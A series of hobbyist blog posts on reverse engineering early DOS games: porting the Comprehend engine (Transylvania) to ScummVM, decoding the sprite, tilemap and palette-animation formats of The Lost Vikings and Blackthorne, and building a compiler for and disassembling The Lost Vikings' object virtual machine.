ScummVM – Comprehend

I’ve been working on porting my implementation of the Comprehend adventure game engine (https://github.com/RyanMallon/recomprehend) to ScummVM. The Comprehend engine was developed by Polarware and used to create a number of graphical/text adventure games including Transylvania, Crimson Crown and Oo-Topos. The game Transylvania holds a bit of nostalgia for me as it was the very first adventure game I ever played way back on the Apple ][. The games were later ported to a variety of platforms including DOS, which is the version I reverse engineered.

dosbox.png

The DOS version of Transylvania

Currently the only game supported is Transylvania, and though there is still a bunch of work to support the engine properly a full play through of the game is possible.

I’m not a C++ developer, so I’ve been stumbling my way through the porting work. I have found the ScummVM source base very cleanly designed and easy to work with though.

If you want to give it a try (you will need a copy of the DOS version of Transylvania):

git clone https://github.com/RyanMallon/scummvm.git
git checkout comprehend
./configure
make
./scummvm
scummvm

Transylvania running in ScummVM

There are a bunch of things that still need to be done:

  • The code is still a bit of a mess. I’ll need to tidy it up before attempting to get this merged.
  • Only Transylvania is currently supported (and only one of its handful of DOS variants). My Re-Comprehend implementation supports Crimson Crown and Oo-Topos also, so those games will eventually be added.
  • The title, before game and ending screens are not implemented for Transylvania.
  • The graphics don’t emulate the CGA correctly. The DOS version of the game use a 128 colour palette which maps to dithering fills for the 4 colour CGA mode. I simplified my implementation of the graphics code by just using solid colours. Some of the colour choices need tweaking.
  • The graphics bleed in a few places. This is probably caused by the line algorithm provided by ScummVM not exactly matching the one used by the original Comprehend games.
  • The sentence parser is very basic. It does not yet handle word pairs (the original engine can convert some pairs of words into a single token) or conjunctions.
  • Pressing enter to flip between full text and graphics modes doesn’t work as it did in the original games.

Finally, a massive thanks to Mark Pelczarksi, one of the developers of the original Comprehend games. I contacted him after doing the reverse engineering work, and he took the time to dig out some old material and give me some insight on the design of the original engine.

Old School Blizzard: Sprites, Maps and Palettes

I’ve been reverse engineering two of Blizzard’s early DOS games, The Lost Vikings and Blackthorne. I’ve previously written about the virtual machine that The Lost Vikings uses for implementing game objects here and here. Blizzard has now made both The Lost Vikings and Blackthorne freely available on Battle.net. Note that Blizzard went by the name Silicon and Synapse for their early games including The Lost Vikings. Blackthorne was the first game released under the Blizzard brand.

This post is about how the sprite formats and tile engine are implemented for the games. The two games use very similar engines, with Blackthorne having a few improvements over The Lost Vikings. I’ll refer to the game engine for both games as the “Blizzard engine”.

The games store all of their data in a single pack file called DATA.DAT. The pack file is an archive which contains chunks for sprites, levels, sounds etc. Most of the chunks in the pack file are compressed using a variant of the LZSS compression algorithm.

I’ve developed a set of basic tools which can be used to view sprites, levels, etc from The Lost Vikings and Blackthorne. You can download the tools from GitHub. I’ve included the command invocations to view the various examples throughout this blog post. All of the screenshots in this post were captured using these tools.

splash

./sprite_view DATA.DAT -fraw -s -u -w344 -p 0x17b 0x17c
./level_view --blackthorne DATA.DAT 1 -h0x6e

Graphics Mode

Both games use the popular “Mode X” VGA mode. Mode X is a 256 colour, 320×240 planar graphics mode. Planar graphics means that, rather than pixels being arranged linearly as they are in the 320×200 VGA Mode 13h they are divided into a set of planes. Planar graphics were originally developed to boost graphics throughput by allowing multiple memory chips to store independent planes and deliver them in parallel. This Shikadi.net article gives a good explanation of how planar graphics work.

Mode X uses four planes. The first plane stores pixels 0, 4, 8, etc. The second stores pixels 1, 5, 9, etc. So for an 8×2 sprite rather than the pixels being stored linearly as:

0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15

Planar Mode X stores them as:

0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15

I did most of the reverse engineering of the sprite formats by looking at the data in the pack file chunks rather than looking at the rendering code in IDA. I have a very rudimentary understanding of DOS and VGA programming and rendering code for old games tends use every optimization trick in the book and clever handcoded assembler, which is difficult (for me) to understand.

Raw Sprite Format

The first sprite format used by the games is just raw encoded planar data. Raw sprites can have any width and height that is divisible by four. Drawing raw sprites is simple:

for (plane = 0; plane < 4; plane++) {
    for (i = 0; i < (sprite_width * sprite_height) / 4; i++) {
        offset = (i * 4) + plane;
        y = offset / sprite_width;
        x = offset % sprite_width;

        pixel = *sprite++;
        dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;
    }
}

Optionally a colour index could be chosen as an transparent colour. Raw sprites of a given width and height always have the same data size, but they are not particularly space efficient. This is especially true for the Blizzard game engine because sprites use only sixteen colours (always values 0x0 to 0xf) meaning that four bytes per pixel are wasted. The reason for using only sixteen colours per sprite is to enable some clever palette tricks which are explained later.

Unpacked/Masked Sprite Format

The second sprite format allows for transparency without sacrificing a colour index at the cost of a more complex drawing algorithm and slightly larger data size. In the tools I developed I’ve called this format “unpacked”, but it “masked” might be a better term.

In this sprite format, each set of eight pixels is preceeded by a mask byte which specifies which pixels to are to be drawn. The transparent pixels are still encoded with the value 0x0 but are skipped over when drawing. This allows the colour index 0x0 to be used as an additional colour.

The algorithm for drawing these sprites looks like this:

for (plane = 0; plane < 4; plane++) {
    x = plane;
    y = 0;
    for (i = 0; i < (sprite_width * sprite_height) / 4 / 8; i++) {
        mask = *sprite++;
        for (bit = 7; bit >= 0; bit--) {
            pixel = *sprite++;

            if (mask & (1 << bit))
                dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;

            x += 4;
            if (x >= sprite_width) {
                y++;
                x = plane;
            }
        }
    }
}

The various collectible items in The Lost Vikings are 16×16 unpacked/masked sprites. They can be viewed with:

./sprite_view DATA.DAT -l2 -funpacked -w16 -h16 0x12f

tlv_items

Packed 32×32 Sprites

The final sprite format is only used in The Lost Vikings and is optimized for drawing 32×32 sprites. Like the unpacked/masked format each set of pixels is preceeded by a mask byte indicating which pixels to draw. However the packed format does not store the transparent pixels and packs two pixels into each byte since only sixteen colours are used. If the number of pixels to be drawn is odd, then the final half byte is zero.

This format is more space efficient the other two formats, but has a more complex drawing algorithm and variable length sprites. Pack file chunks which contain packed format sprites start with a header of 16-bit values indicating the starting offset of each sprite.

The algorithm for drawing the packed sprites is as follows:

for (plane = 0; plane < 4; plane++) {
    for (y = 0; y < 32; y++) {
        num_pixels = 0;
        mask = *sprite++;
        for (bit = 7; bit >= 0; bit--) {
            if (mask & (1 << bit)) {
                pixel = *sprite;
                if (num_pixels & 1)
                    sprite++;
                else
                    pixel >>= 4;
                pixel &= 0xf;

                x = ((7 - bit) * 4) + plane;
                dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;

                num_pixels++;
            }
        }
        if (num_pixels & 1)
            sprite++;
    }
}

While writing this blog post I found this sprite in the header for The Lost Vikings second level which uses the packed 32×32 format, however I don’t remember ever seeing it in the game. Does anybody know if it is a secret or an unused leftover asset? View it with:

./sprite_view DATA.DAT -l2 -fpacked32 0xec -b0x10

tlv_secret_guy

Why Multiple Sprite Formats?

This is a question I can’t fully answer. I am by no means an expert in the intricacies of optimized VGA programming. It’s possible that the different formats are used to improve rendering speed for sprites that need to be updated frequently vs infrequently. Tiles for the maps are always raw format. The raw format is also used for some HUD (head-up dislay) sprites. Sprites using the packed 32×32 format including the vikings and many enemies. The unpacked sprite format is used for some less animated enemies like the gun turret, and other objects like switches and elevators.

Blackthorne doesn’t appear to use the 32×32 packed format at all, probably due to the fact that many of Blackthorne’s sprites are larger than 32×32. Most of the highly animated sprites use the raw format. Blackthorne does not have scrolling levels (it is screen to screen like the original Prince of Persia), which will make rendering quicker.

One thing I don’t yet fully understand is how the Blizzard engine knows which sprite format and size to draw for each object. There is some information in the level headers which corresponds to this, but it isn’t enough to be able to draw all objects correctly. I suspect that parts of the rendering information are managed by the virtual machine.

Sprite Layouts

As mentioned previously, Blackthorne uses larger sprites than The Lost Vikings. Although an algorithm for rendering arbitrarily sized raw sprites can be written, the Blizzard engine takes a different approach. Larger sprites are rendered by composing multiple smaller sprites in a fixed layout. For example, the titular Blackthorne character uses 32×48 sprites, which consist of two 16×16 sprites for the head, and a single 32×32 sprite for the body:

bt_layout_guy

Note that the background colour used here is actually the index 0 colour for the Blackthorne sprites, which is used as the transparent colour in game. You can view the full set of the Blackthorne player sprites with:

./sprite_view --blackthorne DATA.DAT -fraw -w32 -h48 -l2 -b0x80 0x42

It possible that this approach was taken because Blizzard already had written optimized rendering loops for 16×16 and 32×32 sprites, making it faster to draw large sprites as set of smaller sprites rather than one large sprite.

Tilemap Levels

Both The Lost Vikings and Blackthorne are use tilemap levels with 16×16 tiles (though I think the art in both games does a really good job of making it look like this isn’t the case). The sprites used for the tiles are actually 8×8. Each tile has a structure, which I called a “prefab”, that details how a set of 8×8 sprites from a 16×16 tile. Each component piece can be vertically and/or horizontally flipped, allowing the component tiles to be reused.

For example in the full tileset for first level of The Lost Vikings you can see several tiles like the ladders which have mirrored versions, but also a number of tiles which reuse a single corner piece like the riveted blue panels.

tlv_level1_tileset.png

You can view this tileset with:

./tileset_view DATA.DAT 1

The pack file contains a chunk for each tileset describing the prefabs. Each prefab is 8-bytes long, with each tile encoded as a 16-bit value. For each 16-bit value, the sprite index is encoded as 10-bit value, with the remaining 6 bits used for flags. The flags indicate if the sprite is horizontally and/or vertically flipped, and whether this component of the tile is foreground or background. Encoding a foreground/background bit into the prefabs allows the Blizzard engine to use a single tile map to render both layers.

Blackthone extends the engine the prefabs in two ways. First the three unused flag bits are used as a colour base. The Lost Vikings only allocates 16 colours for all the map tiles. By adding the colour base bits Blackthorne is able to use 128 colours for the tiles, though each individual component sprite of the tiles is still limited to 16 colours.

Blackthorne also adds an additional background map layer. This allows the game to have more detailed backgrounds and skies against the jagged foreground tiles. For simplicitly I’ll refer to the secondary background layer as the sky layer, and the main tilemap as the foreground and background layers. The sky layer does not use the foreground/background flag bits, so can be considered as a single
layer.

The following image shows how the tilemap for the first level of Blackthorne is composited:

bt_level.png

You can view this with (note the level number 3 is used, because levels 1 and 2 are the intro cutscene and practice stage):

./level_view --blackthorne DATA.DAT 3

There are some interesting things to note here:

  • Some parts of the sky layer are completely obscured by the foreground layers. This might be due to Blizzard’s development process or tools.
  • The waterfalls are partially drawn on the sky layer and partially on the background. For example, in the bottom right corner, the base of the waterfall is drawn on the sky layer. This is because there is a rock covering the waterfall in the foreground layer. Because of the shape of the rock, this cannot be drawn on using a single map with correct foreground/background handling.
  • There are some areas of the map the appear to be missing. For example the waterfall in the upper middle abruptly ends. This is because Blackthorne uses static rooms instead of scrolling. The empty areas of the map are never visible when playing the game. On some levels this is quite wasteful as entire screens are unused. Blizzard probably chose to implement the screens on a single tilemap even though the game doesn’t scroll so that they could reuse existing code from The Lost Vikings engine.

Everything is a Level

One clever trick Blizzard has used is that almost everything in the game, splash screens, cutscenes, menus, is a level. This undoubtedly saved on development time. Because all the hard work of implementing code for game levels with animation and moving objects is already done, it makes sense to reuse that same code to handle cutscenes and menus. I believe the game engine also uses the virtual machine (see my previous blog post) to implement animation in the cutscene levels. One notable exception to this is The Lost Vikings splash screen at the beginning of this blog, which is encoded as a large, uncompressed raw sprite.

For example, when the game starts up a number of splash screens are shown. Two of these are encoded into a single level (as two rooms). The left of the image below shows the tileset for the level, while the right hand side shows the level itself. In the game, the silhoutte is shown first (which glows, more on this later). The Blackthorne logo is displayed above the main menu.

bt_splash.png

I’m not sure why there are two copies of the Blackthorne logo tiles. Note that they are slighly different colourisation. The TM is black and inside the logo in the top set, and white and outside the logo in the bottom set for example. The tileset may be reused for a different splash screen at the end of the game?

You can view the tileset and level for this splash screen with:

./tileset_view --blackthorne DATA.DAT 1 -c 0x6e 
./level_view --blackthorne DATA.DAT 1 -h0x6e

Palette Management

Earlier I talked about how sprites only use sixteen colours each, always encoding the values as 0x0 – 0xf. This is used to allow each level to define its own palette while allowing sprites to be reused across levels.

In The Lost Vikings there are several worlds including a space world, prehistoric world, and a wacky candy world. Each has its own colour scheme and enemies. The player controlled vikings only use two sixteen colour palette sets (Olaf and Baleog share a green and yellow colour scheme, Erik has a red and blue scheme). The HUD uses another sixteen colour set, and one is also used for items such as keys and health pickups that are used in all of the worlds. This leaves a sizable portion of the 256 colour palette to be defined by the level. Most of the levels load an 128 colour base palette, followed by a set of eight 16 colour palettes.

The per-level palettes also allow sprites to be reused with a different colour scheme. This was a popular trick in era of 8-bit colour and limited storage space. The Mortal Kombat games famously have a number of palette swapped ninja characters. The following image shows the same dinosaur sprites with the palette setting from two different levels:

tlv_dinosaur

To view the two different versions of the dinosaur sprite:

./sprite_view DATA.DAT -fpacked32 -b0xc0 -l5  0xf8
./sprite_view DATA.DAT -fpacked32 -b0xc0 -l10 0xf8

Note that the level number (-l) and base palette offset (-b) arguments are passed to the sprite viewer program. The level number is used to determine which palette chunks to load by parsing the level header chunk. The base palette index has been determined experimentally. Again, this is something I don’t fully understand in the Blizzard engine, and again I suspect that the base palette index may be specified by instructions in the object’s virtual machine program.

Palette Animations

Another popular trick from the DOS days is animating graphics by changing colours in the palette. Animating an object by redrawing the pixels is quite expensive, especially for something large than needs to be updated frequently like the background waterfalls in Blackthorne. Instead of modifying the pixels themselves it is much less expensive to modify colours in the palette, which is immediately updates all pixels of the corresponding colour. This technique is mostly useful for simple cyclical animations like waterfalls and the blinking lights in The Lost Vikings spaceship levels. As mentioned previosly, palette animations are used in Blackthorne to make the silhoutte glow in the startup splash screen.

The Blizzard engine implements palette animations in the level header. Each palette animator has a 8-bit speed value and two 8-bit colour index values. If the two indexes are not equal then the animation cycles the colour values between the two indexes. This format is good for animating things like the waterfalls and blinking lights which appear to move in a pattern.

If the two indexes are equal, then the palette animation is for a single colour and the level header specifies a list of 16-bit values for the animation. The 16-bit values each encode a colour value in RGB-555 format (meaning 5 bits per colour, so one bit wasted). The normal VGA palette, and the Blizzard engine is capable of 6 bits per colour. The palette animations lose the least significant bit by shifting each of the colour values left by one. This palette animation format is useful for animating something like a pulsing light.

You can press ‘A’ in the level viewer to show the palette animations.

Game Over

That’s all for now:

./level_view DATA.DAT 48
./level_view --blackthorne DATA.DAT 23

game_over.png

Recompiling the Lost Vikings

In my previous blog post I talked about reverse engineering the virtual machine used to implement objects in the Lost Vikings. The Lost Vikings was released in 1993 by Silicon and Synapse, now better know as Blizzard.

At the time I empirically tested some opcodes by manually patching the original data chunks with a hex editor. This works, but it fairly tedious, and doesn’t scale well to experimenting with larger programs, or programs that contain loops or jumps. In the first blog post I suggested that creating a simple language and compiler would be useful for further reverse engineering the virtual machine. So, I did.

Building a Compiler

To assist reverse engineering the virtual machine, and also allow for easy creation of new programs I decided to build a compiler. To keep things simple I opted for a single pass, recursive descent parser.

The compiler design is very much based on the PL/0 type compilers often taught in university compiler courses (see PL/0). I won’t go into all the details of writing a basic compiler as there are tons of resources available which already cover this. Basically the compiler takes a source program, performs lexical analysis to create a stream of tokens, and then parses the program, generating code as it goes.

Lost Vikings C

I created a very simple C-like language for implementing object programs in. One advantage of using a C-like language is being able to reuse the existing C preprocessor to support defining constants and macros. The language does not allow for defining variables, you are restricted to the object fields and globals defined by the virtual machine. Built in functions provide support for generating opcodes such yield and spawn object operations. The language makes a few minor deviations from C just to keep the lexer and parser simple.

Sticking with the gun turret object from the first level that I modified in the first blog post, a turret which shoots arrows can be implemented in Lost Vikings C as follows:

#include "vikings.h"

#define timer      field_30
#define DELAY_TIME 40

function main
{
    call set_gfx_prog(0x37bc);

    this.timer = 0;
    while (this.timer != 0xffff) {
        call update_obj();
        call yield();

        if (this.timer != 0) {
            this.timer = this.timer - 1;

        } else {
            // Calculate the offset of the projectile based on the
            // turret's direction.
            if (this.flags & OBJ_FLAG_FLIP_HORIZ) {
                g_tmp_a = this.x - 12;
            } else {
                g_tmp_a = this.x + 12;
            }
            g_tmp_b = this.y - 12;

            // Update the turret animation
            call set_gfx_prog(0x37c8);

            // Spawn an arrow projectile
            call spawn_obj(g_tmp_a, g_tmp_b, 0, 0, 7);

            // Delay for next shot
            this.timer = DELAY_TIME;
        }
    }
}

Each object needs a main loop, which should never terminate. The main loop must call the yield() function to allow the virtual machine processing loop to exit. Failing to do this will cause the game engine to hang. The update_obj() call does basically what it says.

Many of the object fields uses are left up to the specific object. In this case I’ve used field_30 as a timer to control how quickly the turret shoots. When the timer hits zero, the turret fires, and then rearms the timer.

The only thing left to do now is generate code for this program.

Code Generation

The Lost Vikings virtual machine is not an ideal target for a simple compiler. PL/0 type compilers typically generate code for an abstract stack machine, so a simple statement like:

this.x = this.y + 1;

Would generate code like:

push this.y    ; push this.y onto the stack
push 1         ; push 1 onto the stack
add            ; pop the top two values, add them and push the result
pop this.x     ; pop the result into this.x

The Lost Vikings Virtual Machine however does not have a stack. It has a single temporary register, object fields and globals. The above program could be translated as follows for the Lost Vikings virtual machine:

52 20          ; var = this.y
56 1e          ; this.x = var
51 0001        ; var = 0x0001
59 1e          ; this.y += var

This is much more difficult to generate code for when compiling from a general purpose language. It would probably require generating an intermediate representation in the first pass, and then re-ordering instructions, etc in a second pass to generate the final code.

Abstract Machine

The solution I came up with was to build an abstract stack machine, which could be easily compiled for on top of the Lost Vikings virtual machine. This is made possible by the opcodes for loading and storing globals. These opcodes take an offset in the games data segment (DS) as their operand. This allows the opcodes to be used to load or store any arbitrary address in DS.

The compiler generates code by placing a fake stack at a high location (0xf004) in the data segment. Two locations at the base of the fake stack are reserved for special register: 0xf000 is a zero register, and 0xf002 is a flag register used for comparisons. The above statement can now be compiled as:

52 20        ; var = this.x
57 f004      ; ds[f004] = var
51 0001      ; var = 0x0001
57 f006      ; ds[f006] = var
53 f006      ; var = ds[f006]
5a f004      ; ds[f004] += var
53 f004      ; var = ds[f004]
56 1e        ; this.y = var

While not particularly high performance this code is easy to generate. My goal is to build a compiler for testing small programs out to determine what opcodes or combinations of opcodes do. I don’t care too much for efficiency, either in time or code size, for the moment.

A second problem in crafting a language for the original virtual machine is that many of the opcodes conditionally call a function. For example opcode 0x1a checks if the current object has collided with a viking, and if so emits a call instruction. It is more desirable to let the programmer decide whether to use a call or a jump (e.g. an if statement).

I implemented this by emitting code for a generic helper function which sets a flag register and returns. When generating code for an opcode which makes a conditional call the flag register is first cleared. If the opcode makes the call then the flag register will be set. The flag can then be tested to emit a jump call. So, the following code:

if (call collided_with_viking(0x01)) {
    this.x = 1;
}

Generates the following code:

[c009] 51 0000      ; var = 0x0000
[c00c] 57 f002      ; ds[f002] = var, clear the flag register
[c00f] 1a 01 c0a5   ; if (collided_with_viking(0x01)) call c0a5
[c013] 53 f002      ; var = ds[f002]
[c016] 74 f000 c026 ; if (var == ds[f000]) goto c026
[c01b] 51 0001      ; var = 0x0001
[c01e] 57 f004      ; ds[f004] = var
[c021] 53 f004      ; var = ds[f004]
[c024] 56 1e        ; this.field_x = var
[c026] ...          ; next instruction after the if block

; Set flag helper function
[c0a5] 51 0001      ; var = 0x0001
[c0a8] 57 f002      ; ds[f002] = var, set the flag register
[c0ab] 06           ; return

The zero register is used here to compare the flag value against. The compiler emits instructions at the beginning of each program to clear the zero register.

Patching Programs

The virtual machine programs for a single world in the game are all packed into a single chunk in the data file. The compiler takes the simple approach of appending the generated code to the end of the chunk and then modifying the object’s program header to point to the patched in program.

This all works in theory, but there is one slight problem. The game stores the virtual machine programs in the extra segment (ES) at a location which is allocated using the DOS memory allocation API. The memory allocation function looks like this:

alloc_mem_func

The call to allocate memory for the virtual machine programs looks like this:

call_alloc_mem

So 0xc000 bytes (48K) is allocated for the programs. The problem is that the chunk for the space world programs is already 48972 bytes in size, leaving only 180 bytes at the end to patch a new program in. Not much when dealing with a compiler which generates extremely verbose code.

I discovered this problem when attempting to compile a larger program. The game started behaving erratically, either hanging or the gun turret object would randomly vanish. These sorts of issues can be difficult to chase down because it could be a bug in my compiler or generated code, a misunderstanding of how some opcode is meant to work, or a bug or limitation in the original game.

The quick solution is to patch the game binary to extend the size of the program allocation. Raising the allocation size to 0xd000 bytes (52k) works fine, and should be plenty of extra space for experimenting with simple programs. I’ve included instructions for this with the compiler.

Empirical Reversing

The goal in building a compiler was to make it easier to reverse the virtual machine. Testing a new opcode involves adding an entry to a dictionary of functions in the code generator class and providing a function for emitting instructions for the opcode. For example, one of the first opcodes I experimented with was 0x41, which appears in a few disassembled programs like the button/question box object.

It’s dictionary entry in the compiler initially looked like:

"vm_func_41" : (False, 4, emit_builtin_vm_func_41),

The tuple specifies whether the function returns a value, the number of arguments it takes and the code emitter function. Functions are marked as returning a value if the opcode conditionally makes a call or jump.

I knew from looking at the opcode in IDA that opcode 0x41 was unconditionally executed and took four arguments. Its arguments use the variable type encoding that I discussed in the previous blog post. Its emit function looks like this:

def emit_builtin_vm_func_41(self, reg_list):
    operands = self.pack_args(reg_list, 4)
    self.emit(0x41, *operands)

The pack_args helper function handles the packing of variable type arguments.

It can now be called in a quick test program. For testing I use the collided_with_viking function (opcode 0x1a) so that the opcode I am testing is only triggered when a viking touches the turret. Note that the collided_with_viking function takes a single byte operand which I don’t know the use of, but the value 0x01 seems to work. I also use field_32 of the object as a one-time trigger so that the opcode I am testing is only run the first time a viking touches the object.

My test program looks like this:

function main
{
    call set_gfx_prog(0x37bc);

    this.field_32 = 0;
    while (this.field_32 != 0xffff) {
        call update_obj();
        call yield();

        if (call collided_with_viking(0x01)) {
            if (this.field_32 == 0) {
                call vm_func_41(1, 1, 1, 1);
                this.field_32 = 1;
            }
        }
    }
}

This results in the following graphical corruption in game:

dialog_corrupt_gfx.png

It appears the opcode is used to display a dialog box, but it is unclear why the graphical corruption is occurring. Looking at some of the disassembled programs from the original game shows that opcode 0x41 is usually followed by the unknown opcodes 0xcb and 0x42, neither of which take any arguments. Adding builtins for those opcodes to the compiler and re-running results in a the game showing the dialog box, waiting for a keypress, and then the removing the dialog box. So, opcode 0x41 is show dialog, opcode 0xcb is wait for key, and opcode 0x42 is clear dialog.

Further experimentation with opcode 0x41 shows that its first argument is the index of the string for the dialog. The strings are, somewhat unfortunately for modding, stored in the game binary. The second argument is still unknown, and the third and fourth arguments control the x and y offset, relative to the object to display the dialog at.

A good example of why this type of experimental reversing can be useful is to look at the opcode 0xcb in IDA:

func_cb.png

Although this function is small, and what it does is clear (it modifies some globals), it isn’t obvious what effect that has on the game engine. Looking at the cross references for each of the globals in IDA isn’t particularly helpful either. Each of the globals is used in a number of places, none of which make their use immediately obvious. I could have spent a long time in IDA attempting to figure out that setting those globals tells the game engine to wait for a keypress on the next game loop. Empirical testing allowed me to figure it out very quickly. The downside is that I still don’t actually know the exact purpose of each of the globals in the function.

Interesting Fields

One of the interesting things I discovered by experimenting with the compiler is how objects can reference each other. I already knew from my initial reversing that there was some support for this, but the compiler allowed me to quickly work out more of the details.

Field 0x3c in each object specifies a current target object. Some opcodes, such as the collided_with_viking (0x1a) opcode will automatically set this field, but it can also be set manually. The vikings are always objects 0 (Baleog), 1 (Erik) and 2 (Olaf). One a target object is set it can be manipulated via the target fields. Each opcode has variants for modifying the current object field, or the target field. For example opcode 0x59 adds the temporary register to a field in the current object, whereas opcode 0x5b adds the temporary register to a field in the target object.

Other objects can manipulate fields in the viking objects to control their behaviour. For example field 0x32 for the vikings is the amount of pending damage. An object can damage a viking by adding to that field. The vikings themselves are partially implemented by programs in the virtual machine. The next time the viking’s program runs it will check the pending damage field apply damage accordingly.

Other fields of interest are 0x12 and 0x14, which are the x and y velocity for all objects. Prior to writing the compiler I had thought that objects were moved either by adding or subtracting from their x and y offset fields (0x1e and 0x20 respectively) or possibly using a function type opcode. Instead the game uses a pair of velocity fields. Some objects, such as the vikings, will automatically modify their own velocity. So, for example, if an object sets the a vikings velocity to propel it upwards, then on subsequent game loops the viking will adjust its own velocity to cause it to fall back down again.

It seems that there weren’t enough fields in the viking objects to store everything, so each of the vikings four inventory slots are globals. An object can test if an inventory slot is zero by testing if the corresponding global is zero, and give an item to a viking by directly assigning to an inventory slot global.

Advanced Game Hacking

To experiment with the virtual machine, and demonstrate how flexible it is I wrote a slightly more complex program for the gun turret in the first level. The turret checks which viking has touched it and reacts differently. If Erik touches the turret it gives him items. If Olaf touches it he gets bounced into the air. When Baleog touches it the turret flips around. It looks like this in action:

It’s pretty impressive to see this level of flexibility in a game developed in the early nineties. The source code for this program is included with the compiler in the examples directory.

Future Work

There is still a large number of opcodes, fields and globals that I do not yet understand the function of. The compiler has lots of missing features, for example it currently only supports the == and != comparison operators, and lacks most of the bitwise operators. It’s also a bit cumbersome to use, since it requires separately unpacking the original program chunk from the game data file, patching a new program in, and repacking the data file.

The tools are all open source/public domain, and available on github at: https://github.com/RyanMallon/TheLostVikingsTools. You can also follow me on twitter @ryiron.

Finding The Lost Vikings – Reversing a Virtual Machine

After having fun reverse engineering the Comprehend Adventure game (Recomprehend) I was looking for a new DOS game reverse engineering project. Over the years various people have reversed a lot of the old popular games and published specifications and tools for them. The website shikadi.net for example has a of load of information about games I played as a kid.

I discovered that the Blizzard (then Silicon and Synapse) game The Lost Vikings didn’t seem to have had any serious reverse engineering attempts. It was released in 1993 at the tail end of the DOS era, and was a game I really enjoyed playing when I was younger. The Lost Vikings is a puzzle/platformer where the player controls three vikings with different skills. The vikings need to combine their skills to solve their way through a number of themed worlds including a spaceship, a prehistoric world and an Egyptian world. The following image shows the first level of the game (source: Strategy Wiki):

tlv_map01

The game seemed like it would be relatively simple to reverse. The levels are tile map based and contain some simple puzzles such as buttons that activate or disable objects, movable boxes, and a crane that can pick up objects. Indeed, much of the reverse engineering project was straight forward. There is a single data pack file, which contains compressed file chunks. The chunks encode various game assets such as sprites, maps, sounds, etc. I’ve written a collection of tools which can be used to view the game assets: The Lost Vikings Tools.

The Virtual Machine

One interesting aspect of how the game engine works is that the objects in the game use a template class system. There is a chunk in the data file for each world that defines a set of object classes. For example, in the first level image above both of the hazard doors are class type 0x4f. Reverse engineering the object class code lead to this function:

func_caller

Ignoring for now the alternative path into location 0x142a2, this code is using si as an index into the object classes array structure (each class template is 0x15 bytes). The word at offset 0x3 in this structure is used as an address in the ES segment. The ES segment actually contains the entire object class template chunk data. The code then moves into the loop at address 0x142a6. This loop fetches the next byte from the ES segment and uses it as an index to a function table. At each step in the loop bx contains the address in the ES segment, and si contains the current opcode.

An interesting thing to note here is that the loop is using an unconditional jump and therefore will never terminate. At least, not normally. It appears that each object class has some form of opcode based program associated with it, which is interpreted by this function. My initial approach was to just start looking at some of the functions in the call table. The first one looks like this in IDA’s graph mode:

vm_func_01_graph

IDA’s stack analysis has failed here, and with good reason. Popping ax as the first instruction in a function is pretty weird. The x86 call instruction pushes the instruction pointer (ip) onto the stack, and the ret instruction pops it to return to the calling function. The pop instruction here is effectively discarding the return address, which means the next ret instruction will jump back two stack frames instead of one. This opcode will exit the infinite interpreter loop.

To see how the opcode is really implemented we need to switch to the linear view in IDA:

vm_func_01_linear

I’ve annotated the names of the functions with their corresponding opcode numbers to make this code section clearer. There is a little bit of clever code reuse going on here. It’s easiest to start by looking at opcode 0x03. Recall the the loop which is handling opcodes has the object classes chunk data loaded in the ES segment, and bx is being used as the VM instruction pointer. Opcode 0x03 is therefore an unconditional jump instruction. It loads the word at the current instruction pointer, sets the instruction pointer to it, and then returns to the opcode handler loop.

Working backwards, opcode 0x05 skips the next word operand and stores the next address into an array. Reversing other functions shows that word_28522 is the index of the current object instance, so this opcode can store a single address for each object in the level. It then restores the value of bx and falls through into the code for opcode 0x03 (jump). So this opcode appears to be a very limited call instruction with only a single level of stack.

Opcode 0x00 is storing the current instruction pointer in a global array. Note that this is different to opcode 0x05 which is storing the address after the call address operand. It then falls into the call opcode handler. The instruction however won’t actually be executed because of the initial pop instruction. Instead the calling loop will exit. The address saved by this instruction is used as the alternate entry path to the function calling loop that I ignore earlier. Opcode 0x00 is there acting as a sort of co-routine style exit. It stores the current position in the program, and exits the opcode handler loop, allowing the game engine to do other things such as update graphic, receive input, etc before returning where the virtual machine program left of. This allows a virtual machine program to perform complex tasks without stalling the rest of the game engine.

Disassembling Opcodes

At this point I had a general feel for how the virtual machine opcode handlers worked. Looking at the function call table there are around 215 implemented opcodes, so rather than just reversing them in order I started writing a simple script to decompile a program for a given object class so that I could focus on just the opcodes being called by objects in the first level.

At this point I am mostly trying to determine how many operands an opcode has, and what its basic functionality is. If an opcode handler is a short then I will generally try to fully understand what it does. If it is more than a few blocks of code then I will just try to figure out how many operands it has and whether or not it does a conditional jump or call. The reason for this is that sometimes an opcode’s function because apparent from surrounding context in the disassembled program, which is often quicker than reversing the code.

The following is a simple opcode:

vm_func_51

This opcode take a word operand and stores it in a global. Reversing other functions shows that this global is a general purpose temporary storage or register. The virtual machine only has one such register, but it also has this opcode:

vm_func_57

This opcode stores the current value of the general purpose register at the address in the data segment (DS) specified by the word operand. The programs in the game’s data file use this opcode to write to specific parts of the game data such as the inventory slots for the vikings. A few DS offsets are also used as additional temporary values when more than one is required. Offsets 0x0206 and 0x0208 are often used as temporary x and y coordinates of an object for example.

What makes this opcode and its counterpart opcode 0x53 which reads from DS into the general purpose register interesting is that it can read and write any game data in DS, not just what was intended by the original game creators. It makes extending the original game an interesting prospect.

A more complex opcode is 0x14:

vm_func_14

At first glance this looks straight forward to reverse. It fetches a byte operand, and calls a pair of sub-functions. It then fetches another byte operand and calls the same sub-functions again. Looking at the first sub-function (sub_15473) though things get a bit more complicated:

vm_func_14_internal

IDA’s stack analysis has failed again, and it shows four exits from this block which I have cropped out because they are all incorrect. What is actually happening is that the first byte operand is passed into this function in ax, which is then used as an index into a jump table. Although ax is and’ed with 7, there are actually only 4 valid entries in the jump table. Looking at type 0 in the jump table we see:

vm_func_14_jump_00

Which loads an immediate word operand. This function snippet does a retn, which returns from the top-level opcode 0x14 handler. It’s not hard to see why IDA is struggling with disassembling this code correctly.

The other entries in the jump table load values in different ways, and then each also do a retn. Type 1 takes a byte operand which is used an object field index. Object has fields for things like the x and y offset, flags, etc. Type 2 takes a word operand and loads a value from DS (like opcode 0x53 above). Type 3 takes a byte operand and loads the field of a target object for actions such as collision detection.

